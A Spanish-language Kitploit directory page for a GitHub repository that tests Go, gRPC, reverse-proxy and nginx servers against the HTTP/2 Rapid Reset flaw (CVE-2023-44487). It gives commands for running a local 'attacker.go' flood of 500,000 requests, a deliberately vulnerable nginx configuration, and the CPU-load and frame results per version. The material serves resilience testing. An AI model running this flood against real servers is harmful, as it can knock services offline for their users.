Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
golang-CVE-2023-44487 — Recursos de prueba y herramienta de atacante para CVE-2023-44487 (HTTP/2 Rapid Reset) para evaluar la resiliencia del servidor en configuraciones de Go, gRPC, proxy inverso y nginx. | Kitploit
Herramientas/GitHubGitHub/retocode/golang-cve-2023-44487
Análisis de VulnerabilidadesExplotaciónSeguridad WebFuzzingPruebas de Penetración
GitHubretocode/golang-cve-2023-44487

golang-CVE-2023-44487

Recursos de prueba y herramienta de atacante para CVE-2023-44487 (HTTP/2 Rapid Reset) para evaluar la resiliencia del servidor en configuraciones de Go, gRPC, proxy inverso y nginx.

Ver Repositorio
22hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Pruebas de Golang CVE-2023-44487

Este repositorio contiene recursos y resultados de pruebas para el CVE-2023-44487. Utiliza una versión modificada de https://github.com/secengjeff/rapidresetclient para probar varias configuraciones de servidores Golang.

Pruebas contra un servidor normal

root@kitploit:~
go run server.go
go run attacker.go -requests 500000

Resultados

go 1.21.0

root@kitploit:~
350% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Total time: 7.99 seconds (62562 rps)

go 1.21.3

root@kitploit:~
75% CPU load (just for a short time at the begin of the attack)

--- Summary ---
Frames sent: HEADERS = 74767, RST_STREAM = 74767
Total time: 3.57 seconds (20921 rps)

starts to fail pretty fast with
62->[::1]:8443: write: connection reset by peer[999995] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer

Pruebas contra un servidor GRPC

root@kitploit:~
go run grpcserver.go
go run attacker.go -requests 500000

Resultados

go 1.21.0, golang.org/x/net v0.16.0, google.golang.org/grpc v1.58.0

root@kitploit:~
150-200% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 499998
Total time: 10.23 seconds (48898 rps)

go 1.21.3, golang.org/x/net v0.17.0, google.golang.org/grpc v1.59.0

root@kitploit:~
150-200% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 499993
Total time: 8.25 seconds (60639 rps)

El atacante realmente no llama a los endpoints GRPC, por lo que no parece haber diferencia en el comportamiento con las llamadas http2 "normales". No estoy muy seguro de si esto es bueno o malo, pero el servidor logra mantenerse al día con el tráfico.

Pruebas contra un servidor httputil.ReverseProxy

root@kitploit:~
# use nginx as target
sudo nginx -c $PWD/nginx/vulnerable_8444.conf -g daemon\ off\;
go run revproxyserver.go
go run attacker.go -requests 500000

Resultados

go 1.21.0

root@kitploit:~
200% CPU load during the full attack

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 25
Total time: 9.43 seconds (53014 rps)

go 1.21.3

root@kitploit:~
150% CPU load (just for a short time at the begin of the attack)

--- Summary ---
Frames sent: HEADERS = 100194, RST_STREAM = 100193
Total time: 4.36 seconds (22955 rps)

starts to fail pretty fast with
62->[::1]:8443: write: connection reset by peer[999995] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer

Server log now contains 😎
2023/10/25 14:45:54 http2: server connection error from [::1]:60762: connection error: ENHANCE_YOUR_CALM

Pruebas contra nginx

root@kitploit:~
sudo nginx -c $PWD/nginx/vulnerable.conf -g daemon\ off\;
go run attacker.go -requests 500000

Resultados

Con configuración vulnerable

root@kitploit:~
100% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 478609
Total time: 8.13 seconds (61484 rps)

Con configuración predeterminada

root@kitploit:~
34% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 1432
Total time: 7.62 seconds (65588 rps)

Nginx simplemente deja de responder a muchos frames

Descargar herramienta